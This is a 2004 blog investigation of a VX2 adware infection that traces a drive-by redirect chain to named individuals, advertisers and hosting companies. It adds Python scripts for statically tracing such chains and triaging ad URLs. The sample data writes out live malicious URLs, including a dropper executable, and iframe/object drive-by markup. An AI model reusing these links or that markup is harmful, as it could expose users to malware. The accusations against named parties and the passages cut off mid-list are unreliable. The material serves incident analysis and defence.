
I first published this article in my online journal on November 7, 2004. It details an infection of a Windows 2000 system belonging to my girlfriend with a particularly odious piece of malware called VX2, software which serves up ads on an infected computer and which goes to extraordinary lengths to prevent itself from being removed. The article traces the avenue of infection, the people responsible for the infection, and the people who profit from the distribution of malicious software like this.

If you're reading this post and you're on a Windows computer, the odds are overwhelming--between 80% and 90%--that you are infected with at least one virus or spyware program, and the odds are very high that you're infected with dozens or hundreds.
Yes, you. Even if you are technically literate, you have a firewall, and you never download suspicious attachments, you are almost certainly infected.
There is lots and lots and lots of money in computer viruses and spyware, especially the variety that makes popup ads appear on your machine. The question I've always had, though, is who's making all this money by infecting your computer?

A couple of nights ago, Shelly's computer became infected. Shelly's technically savvy, the apartment we live in is on a closed private network with a hardware firewall between us and the Internet, and she also runs a software firewall on her computer, and she became infected nonetheless. I spent about six hours removing the infection, tracking down the source of the infection, and painstakingly backtracking all the popup ads that the adware displayed on her computer. My goal: Follow the money. Discover where the infection came from, and who was making money from it. The results were, to say the least, interesting.

If you don't care about stuff like this, you can skip the rest of this message. If you're curious about the mechanisms by which spyware and viruses work, who is responsible for them, why they're so common, how they spread, and most important, who makes money by creating and releasing them, read on!

Shelly's computer started behaving strangely late Wednesday afternoon, taking a long time to boot and displaying popup ads whenever she launched Internet Explorer. Running the anti-spyware program Ad-Aware revealed that the computer was infected with a very nasty bit of malware called VX2, first introduced to the Internet public by a company calling itself VX2, which has since become defunct. The VX2 program has continued to be developed and to become nastier, more destructive, and more malicious as time goes on; today's VX2 is extremely sophisticated, highly destructive, and almost impossible to remove. Ad-Aware and a similar program called Spybot Search & Destroy could see the infection, but could not remove it.
VX2 remains memory-resident even if its files are deleted, and constantly monitors attempts to get rid of it; if it is removed or the computer's Registry is changed, this evil little bastard changes the Registry back and rewrites itself to disk under a different name. It also sets itself up as a critical system service (so it runs even when the computer is booted in safe mode), and cloaks itself so that it does not appear in the Task Manager. Earlier versions of VX2 could only conceal themselves in the Task Manager under Windows 95/98/Me; VX2 Variant 3 appears to be able to conceal itself in the Task Manager under Windows NT/2000/XP as well.

Ad-Aware has a special plug-in module written especially to remove VX2. This plug-in confirmed that Shelly's computer was infected with what it described as "VX2 Variant 3," but even the plug-in could not remove the infection; it appears that Shelly had become infected with a brand-new VX2 variant, more cunning and more malicious than even the worst variant known to Ad-Aware.

But from where? Now things get interesting. In following the source of the infection, I ended up on a virtual trip that went from Dallas, Texas, through servers in Russia and Nevada, and finally back to the source in Rosemount, Minnesota. Along the way, it involved a surprising number of big-name, supposedly reputable companies, all of whom are profiting either directly or indirectly from viruses and spyware.

Shelly's computer first became infected when her browser visited the Web address "http://69.20.56.3/ normal/yyy12.html" (I have put a space in the URL so that it is not a live link). At the time I am writing this, this Web address is still active.

I don't know what brought her to that site; it may have been a redirect, a browser hijack, even a maliciously constructed banner ad. The site infects a computer using an Internet Explorer iFrame exploit. Put most simply, if a Web page contains an iFrame that points to another Web page containing an OBJECT tag, Internet Explorer downloads the file referenced in the OBJECT tag (in this case, a dropper for VX2) and runs it silently, without the user's knowledge or consent; the iFrame is what lets the page carrying the OBJECT tag be loaded invisibly inside an otherwise innocuous page. Versions of Internet Explorer prior to the version that shipped with Windows XP SP2 are all vulnerable; I have not tested the version of Explorer that shipped with XP SP2 or versions patched by subsequent security fixes. I do know that Microsoft has since closed several iFrame exploits. I do not know if this exploit is one of them.

The Web site at 69.20.56.3 is running on a computer whose ISP connection is provided by a company called Rackspace, a large and busy Texas-based ISP with international offices and a long history of supporting and condoning spam and other unethical behavior; in fact, Rackspace even has its own entire section on the Blackholes.us spam support blacklisting service. So Rackspace is the first company profiting from the infection; they're making money by providing Internet connections for the URL hosting the malware dropper. Remember the name Rackspace; we'll be seeing it again later.

So. Moving along: the virus-dropping Web site at 69.20.56.3 is nothing but a simple redirector. It redirects to "http://213.159.98.203/ ads/banners/banner3.php?ID=1". Again, I have put a space in this URL.
This page is referenced by an iFrame from the preceding page, and contains an iFrame pointing to the next server in the chain, which contains the actual dropper; we'll get to that in a moment. This Web site is hosted on a server in Russia; the ISP is a Russian service called Linkey.ru. They are the second group of people in the chain making money from viruses and spyware, by hosting a virus dropper. I don't know if they're a knowing participant or just an innocent ISP who's unknowingly hosting a virus dropper.
Onward and upward: The Russian virus host itself is also nothing but a redirector. Clearly, the person responsible for the virus wants to put some distance between himself and the virus; we've already gone through two redirectors in two countries. The Russian Web site contains an Internet Explorer iFrame exploit which causes Internet Explorer to load a program from the URL "http://www.xzoomy.com/ stc.php?stid=007". Once again, I have put a space in the URL; if you visit this Web site, and allow your browser to download the executable that it references, you'll be infected with VX2.
Now we're getting somewhere. The xzoomy.com Web site is a search engine that's well-known in anti-virus and anti-spyware circles. Xzoomy.com makes a small profit every time someone uses their Web page to do a search; they have a long and ignoble history of attracting visitors through the use of spyware, adware, and viruses. They've been responsible for their own spyware/adware software, and they've got their hands in an Internet gambling site called "free scratch and win" as well. These guys are looking more and more like our scumbags, eh? This site is registered to:

So Mike Cass is up to his ears in this mess. Mike's Web site, well-known for being the source of spyware and adware, is hosted by an ISP called Peer 1 Network, an outfit in Montreal known to be indifferent to spammers. Mike and Peer 1 Network are making money here--Peer 1 by hosting Mike's Web site in spite of the fact that it's known to be associated with adware and spyware, Mike because he makes money every time someone visits his site.

But wait, there's more! The xzoomy.com Web site is another redirector. It redirects to "http://www.2nd-thought.com/ files/install007.exe" (I've put a space in the URL), and it loads and executes the Windows program install007.exe from the 2nd-thought.com Web site by using an OBJECT tag. This file, install007.exe, is the actual executable that installs the adware. If you're using Internet Explorer for Windows and you visit any of the pages before this in the chain, install007.exe downloads and runs silently without prompting you: Internet Explorer fetches and executes the program named in the OBJECT tag, and the chain of iFrames pulls that OBJECT tag into whatever page you are looking at without your ever seeing the site that hosts it. This is also why other browsers are safer: they render iFrames just as Internet Explorer does, but they do not download and run a native executable named in an OBJECT tag. The program install007.exe loads and runs as soon as the browser hits that page; the computer's owner never gets any warning and has no opportunity to stop it. As you may have guessed, install007.exe installs VX2 on the victim's computer.

Note that all this--the numerous redirects, downloading the program from the 2nd-thought Web site, installing the VX2 virus--all happened automatically and silently; at no point is the computer owner aware of what is going on, and at no point does the computer owner know that a virus is being loaded onto his computer.

2nd-thought.com is the primary villain here. They are hosting the installer itself; they are the people actually placing VX2 on the victims' computers without permission or notification. Let's take a look-see and find out who these guys are:

Well, lookit that, another Canuck. What is up with Canadian spyware and virus profiteers, eh? Does Canada have particularly lax computer-crime laws?
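The backtracking described above (fetch each page, find the iFrame or OBJECT it points at, move on to the next host) can be done without ever rendering a page or running the dropper. The following is an added example, not code from the original article: a static walker that parses each page for the references a browser would load on its own and records the hosts it passes through. The sample pages are constructed stand-ins for the chain described in the article (simplified markup, no real classid, a placeholder in place of the binary), the `fetch_sample` function is an offline substitute for an HTTP client, and the self-referencing and META-refresh pages are made up to exercise loop detection and relative-URL resolution.

```python
"""Static trace of a drive-by redirect chain.

Each page is fetched through a caller-supplied fetch() and parsed for the
references a browser would follow with no user interaction (iframe/frame
src, OBJECT codebase/data, EMBED src, META refresh); nothing is rendered
and nothing is executed. The walk stops at a non-HTML payload, a dead
end, a loop, or the depth limit, and records the host of every hop.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed stand-ins for the chain the article describes; the markup is
# simplified (no real classid) and is not a capture of the actual sites.
SAMPLE_PAGES = {
    "http://69.20.56.3/normal/yyy12.html": ("text/html",
        '<html><body><iframe src="http://213.159.98.203/ads/banners/banner3.php?ID=1"'
        ' width="0" height="0"></iframe></body></html>'),
    "http://213.159.98.203/ads/banners/banner3.php?ID=1": ("text/html",
        '<iframe src="http://www.xzoomy.com/stc.php?stid=007"></iframe>'),
    "http://www.xzoomy.com/stc.php?stid=007": ("text/html",
        '<object codebase="http://www.2nd-thought.com/files/install007.exe"></object>'),
    "http://www.2nd-thought.com/files/install007.exe": ("application/octet-stream",
        "MZ..."),   # placeholder for the dropper; it is never run, only noted as a hop
    # Made-up pages to exercise loop detection and META refresh with a relative URL.
    "http://loop.example/a.html": ("text/html", '<iframe src="a.html"></iframe>'),
    "http://meta.example/r.html": ("text/html",
        '<meta http-equiv="Refresh" content="0; URL=/landing.html">'),
}


def fetch_sample(url):
    """Offline stand-in for an HTTP client: returns (content_type, body)."""
    return SAMPLE_PAGES.get(url, (None, ""))


class AutoLoadRefs(HTMLParser):
    """Collect (kind, absolute_url) for everything the page loads on its own."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.refs = []

    def _add(self, kind, target):
        self.refs.append((kind, urljoin(self.base_url, target.strip())))

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}      # HTMLParser lower-cases names
        if tag in ("iframe", "frame", "embed") and a.get("src"):
            self._add(tag, a["src"])
        elif tag == "object":
            for key in ("codebase", "data"):       # codebase is the IE download path
                if a.get(key):
                    self._add("object", a[key])
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content", ""), re.I)
            if m:
                self._add("meta-refresh", m.group(1))


def walk_chain(start_url, fetch, max_depth=10):
    """Follow the first auto-loading reference on each page; return the hops."""
    chain, seen, url = [], set(), start_url
    while url and len(chain) < max_depth:
        hop = {"url": url, "host": urlparse(url).hostname, "kind": None, "next": None}
        chain.append(hop)
        if url in seen:
            hop["note"] = "loop"
            break
        seen.add(url)
        ctype, body = fetch(url)
        if ctype is None:
            hop["note"] = "unreachable"
            break
        if not ctype.startswith("text/html"):
            hop["note"] = "payload (%s)" % ctype
            break
        parser = AutoLoadRefs(url)
        parser.feed(body)
        if not parser.refs:
            hop["note"] = "dead end"
            break
        hop["kind"], hop["next"] = parser.refs[0]
        hop["note"] = "redirects via %s" % hop["kind"]
        url = hop["next"]
    return chain


if __name__ == "__main__":
    for hop in walk_chain("http://69.20.56.3/normal/yyy12.html", fetch_sample):
        print("%-24s %s" % (hop["host"], hop["note"]))
```

To run this against live sites you would swap `fetch_sample` for a function that downloads with a plain HTTP client and returns the Content-Type and body; the walker only ever parses text, so the dropper is written to disk at most as bytes you choose to save. Two caveats a practitioner should expect: a malicious server may hand a non-Internet Explorer User-Agent a harmless page, so the trace can look shorter than what the victim's browser saw, and a page can carry several auto-loading references, of which this walker follows only the first.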
2nd-thought.com is hosted by Peer 1 Networks as well. 2nd-thought.com is also a well-known scourge on the Internet, notorious for releasing a spyware program that changes your home page to their page, and for redirecting search engine searches you do to porn sites. That's two scumbags with long histories of Internet abuse, both hosted on Peer 1 Networks and both, apparently, now working together. Mike Cass, Don Lativalle, and Peer 1 Networks: three people or organizations with shady pasts and questionable ethics, three people or organizations who are apparently involved with loading VX2 onto Shelly's computer.

So now we know how VX2 ended up on Shelly's computer. We know which people are responsible, we know what businesses support and profit from them, and we know they've gone to a whole lot of trouble and effort to hide themselves. We know that the people, Mike Cass and Don Lativalle, have histories of releasing spyware and adware to infect people's computers, we know they run for-profit Web sites, and we know that they have independently established histories of using dubious and unethical practices to get traffic to those Web sites. We know they're both Canadian, we know they have found a Canadian ISP in Peer 1 Networks willing to turn a blind eye to outrageous network abuse, and we know that they appear to have teamed up to spread an extremely malicious variant of a program already known for being almost impossible to get rid of.

What's left is discovering the why. What's the mechanism by which they make money? How do they profit from infecting you with VX2? Where does the money come from, and where does it go? For that, I had to turn to the actions that this VX2 variant takes once it's infected the computer, and to the ads it serves up. This particular strain of VX2 does two things. First, it carries a payload unusual for adware: it loads another adware program called Bargain Buddy.

Bargain Buddy's Web site is at cashbackbuddy.com, which is hosted by Globix, a Web-hosting company headquartered in the United Kingdom. The cashbackbuddy.com Web site attempts to get people to deliberately infect themselves with the Bargain Buddy scumware by telling them "the new Software helps the end-user maximize his/her savings and gain cash back commissions from purchases made at all participating on-line and some offline merchants" (and so on, and so on). CashBackBuddy and its scumware are operated by an outfit called eXact Advertising:

eXact Advertising owns a number of different Internet properties, including pay-for-placement search engines, Mail.com, a personals Web site called "luvbandit," and so on.

The Bargain Buddy software is pretty straightforward: every now and then, it loads an ad on the victim's computer. Each time an ad is served, eXact Advertising makes a few cents from the advertisers who pay for the ads. Some of this money goes to Bargain Buddy "referrers"; the rest is profit. So what that means is that if I sign up with eXact Advertising, then get you to put the Bargain Buddy adware on your computer, every time an ad pops up, the advertiser pays eXact Advertising some money, and eXact Advertising pays me some money.

eXact Advertising claims to be "opt-in"; they say the only way you'll get Bargain Buddy is if you explicitly sign up and put it on your computer voluntarily. They lie, of course; the fact that they're doing business with referrers such as Mike Cass and Don Lativalle, who use very sneaky ways indeed to get the software onto your computer, proves it. They pretend to be good guys helping consumers save money; in reality, they don't care so long as people can be cajoled, tricked, or forced into installing their software, with or without their consent.

So. Now Shelly's computer is infected with two adware programs: Bargain Buddy by eXact Advertising, who is paying the people responsible for the infection, and a custom version of VX2, which prevents itself from being removed easily, installs Bargain Buddy, and also serves ads on its own. Now popup ads are popping up all over the place. Some of them are from eXact Advertising, a shady company that's written its own custom adware. Some of them are from VX2 itself. It's the latter ones, the ones that VX2 is generating, that are the most interesting. VX2 brings in ads from, of all places, Revenue.net, a very large mainstream online advertising broker that serves up banner ads, popup and popunder ads, and contextual ads for a lot of big-name clients. Revenue.net does serve popup ads and popunder ads, primarily from Web sites rather than adware.

The ads being brought in from the VX2 infection were being pulled from Revenue.net; the persons responsible for the VX2 infection were Revenue.net affiliates. I fired off an email to Revenue.net, with the URLs of some of the popup ads being pulled in by the virus. Revenue.net, rather to my surprise, actually responded, and claimed that the affiliate code attached to the popup ads appearing on Shelly's computer belonged to an outfit calling itself "look2me.com". Look2me.com is--surprise surprise--a Web advertising company that makes money from popup ads. Look2me.com is a Revenue.net affiliate; Look2me.com gets people to view ads produced by Revenue.net, the advertiser pays Revenue.net, who then pays a percentage of the take to look2me.com. Look2me.com is hosted by...

Look2me.com is owned by:

NicTech Networks also owns a dating service called "SimilarSingles.com". Sound familiar?

eXact Advertising, based in New York, is an Internet advertising company that serves popup ads on virus-infected computers and also owns an online dating service. NicTech Networks, based in Minnesota, is an Internet advertising company that serves popup ads on virus-infected computers and also owns an online dating service. Two well-known and unethical Canadians, Mike Cass and Don Lativalle, each with separate histories of profiting from adware and malware, are jointly responsible for a computer infection which serves popup ads from eXact Advertising and NicTech Networks. NicTech Networks is hosted by Rackspace; the initial point of infection of the virus is a Web site hosted by Rackspace. Rackspace is looking pretty bad here. In fact, Rackspace and Peer 1 Networks are both obviously dirty; both are up to their elbows in hosting and providing services for people who make money by serving popup ads through viruses and malware.

It's hard to argue that either Rackspace or Peer 1 Networks is simply being duped by a client, particularly in light of the fact that emails to both outfits concerning this situation go unanswered, and in light of the fact that the virus-dropping Web site is still up three days after I've emailed the responsible hosts. After complaining to both ISPs, I still have not had a response from either. As of this writing, neither Rackspace nor Peer 1 has taken any action against the Web sites named in this report.

So. Advertisers pay eXact Advertising and Revenue.net. eXact Advertising and Revenue.net then go on to pay affiliates who have infected target computers with malware to serve up the ads. The affiliates host their virus-dropping Web sites, along with Web sites that profit in other ways from viruses and malware, on Canadian ISP Peer 1 Networks and American ISP Rackspace.com. The money goes from the advertisers to eXact Advertising and Revenue.net; some of this money then goes to the affiliates, who infect the computers with malware; some of the money the virus-spreaders make in turn goes to Peer 1 Networks and Rackspace, who turn a blind eye to what their clients are doing.

But where does the money originate? Obviously, the advertisers are only buying ads because they think the ads will work; that means somebody is clicking on these popup ads and buying the advertisers' products. But who on earth would spend money on an annoying popup ad? What could possibly induce someone to take out his wallet when everyone knows that virus-spawned popup ads are among the most annoying things on Earth?

Ah, that's the pure genius of it--that's the brilliance of the scheme, honed to a fine edge. The popup ads you get when you're infected with VX2? They advertise...

...spyware removal and popup blocking tools.
ADDITIONAL BACKGROUND INFORMATION ABOUT VX2 I recently received an email from an individual, who's asked not to be identified, who says he used to work with the people responsible for the creation of VX2. I've received permission to reproduce the contents of that email, minus personally identifying information; the contents of the email are below.
...can be a nightmare. There are several variants of VX2; each is more sophisticated than the last at preventing itself from being removed. Almost all VX2 variants hide themselves by patching the Task Manager, so their processes do not show up when you bring up the Task Manager; some of the later versions also conceal themselves from Windows Explorer, so you cannot see the viral files on your hard drive even if you know where they are and what they're named. One thing all VX2 variants have in common is that they are virtually impossible to stop on an infected machine. VX2 loads even when a Windows computer is booted in "safe mode." It's characterized by having multiple processes which watchdog each other and the system Registry; if one VX2 process is terminated, it's re-started by the other, and if the Registry is modified to remove calls to VX2 while VX2 is running, it immediately rewrites the Registry to add itself back. VX2 is also polymorphic, in the sense that its executable files may be renamed each time the computer is restarted or shut down. The earliest VX2 variant can be removed by LavaSoft's Ad-Aware, which is available at download.com. VX2 variants 2 and 3 cannot be removed by Ad-Aware alone, but can often be removed by the Ad-Aware VX2 Plugin. (Be sure to follow the instructions precisely when using this plugin!) Later variants cannot be removed even by this plugin. I've not had any success removing any variant of VX2 using Spybot Search & Destroy. I'm told that Microsoft's anti-spyware application can remove some variants of VX2, though I have not tried it myself.
Removing VX2 in cases where applications such as Ad-Aware have failed requires either access to another computer, or access to a bootable floppy disk. You can create a bootable floppy using Windows; the process is different for different versions of Windows, and is explained in Windows Help. If you have access to either a bootable floppy or to a second computer, the process goes like this:
I've also received an email from at least one person who's had success against some VX2 variants by using the following method, which may be worth a first shot at dealing with a VX2 infection:
Anyone with additional information on VX2 may reach me by email. If you have comments or questions, please feel free to email me or to reply in the LiveJournal entry regarding VX2. [Update]: If you are infected with VX2, I am especially interested in a sampling of the URLs it is serving up ads from. You probably will not be able to see the URL in a popup ad, but you should be able to see the URL in the Internet Explorer history. The URLs are probably very long. I believe that VX2 pulls ads from respected, big-name, mainstream Web advertising companies, who turn a blind eye to people using illegal techniques or software to present ads. I am particularly interested to know whether or not the new VX2 variants still pull ads from Revenue.com.
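The "follow the money" step earlier in the article, and the request above for ad URLs out of the Internet Explorer history, come down to the same chore: take a pile of long ad URLs, group them by the network that served them, and pull out whatever query parameter carries the affiliate code so the network can be asked who it belongs to. The following is an added example, not code from the original article. The sample history entries and their hosts are constructed for illustration, and the list of parameter names is a general-purpose guess at where affiliate or publisher identifiers usually live, not the scheme of any network named in the article.

```python
"""Triage of ad URLs recovered from a browser history.

Groups the URLs by the host that served the ad and pulls out the query
parameters that look like an affiliate/publisher identifier, so the
question "whose affiliate code is on these ads?" can be put to the ad
network with the evidence attached.
"""
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlparse

# Query-parameter names that commonly carry an affiliate, publisher or
# campaign identifier. This is a general-purpose guess, not the scheme of
# any particular ad network.
ID_PARAMS = {"aid", "affid", "affiliate", "pid", "pubid", "publisher",
             "sid", "cid", "ref", "refid", "id"}

# Constructed history entries with made-up hosts; not real captures.
SAMPLE_HISTORY = [
    "http://ads.example-network.net/show.php?aid=4471&z=popup&u=http%3A%2F%2Fwww.example.com%2F",
    "http://ads.example-network.net/show.php?aid=4471&z=popunder&kw=spyware+removal",
    "http://ads.example-network.net/show.php?aid=9002&z=popup",
    "http://banners.other-example.com/img.gif?pubid=p1234&cid=77",
    "http://www.example.com/",        # ordinary browsing: no identifier parameters
    "file:///C:/Documents%20and%20Settings/user/Desktop/notes.txt",
    "not a url at all",
]


def affiliate_ids(url):
    """Return {param: [values]} for the identifier-looking parameters of one URL."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.query:
        return {}
    query = parse_qs(parsed.query)
    return {k: v for k, v in query.items() if k.lower() in ID_PARAMS}


def summarize(history):
    """host -> param -> {value: count} over the URLs that carry an identifier."""
    summary = defaultdict(lambda: defaultdict(Counter))
    for url in history:
        ids = affiliate_ids(url)
        if not ids:
            continue
        host = urlparse(url).hostname
        for param, values in ids.items():
            summary[host][param].update(values)
    return {h: {p: dict(c) for p, c in params.items()} for h, params in summary.items()}


def report(history):
    """One line per (host, param, value), most frequent first, for an abuse report."""
    rows = []
    for host, params in summarize(history).items():
        for param, counts in params.items():
            for value, n in counts.items():
                rows.append((n, host, param, value))
    rows.sort(key=lambda r: (-r[0], r[1], r[2], r[3]))
    return ["%3d  %s  %s=%s" % r for r in rows]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_HISTORY)))
```

The value that repeats across many ad URLs from one host is the one worth sending to that network's abuse desk; a parameter that changes on every URL is more likely a click or session token than an affiliate code, and the counts make the two easy to tell apart.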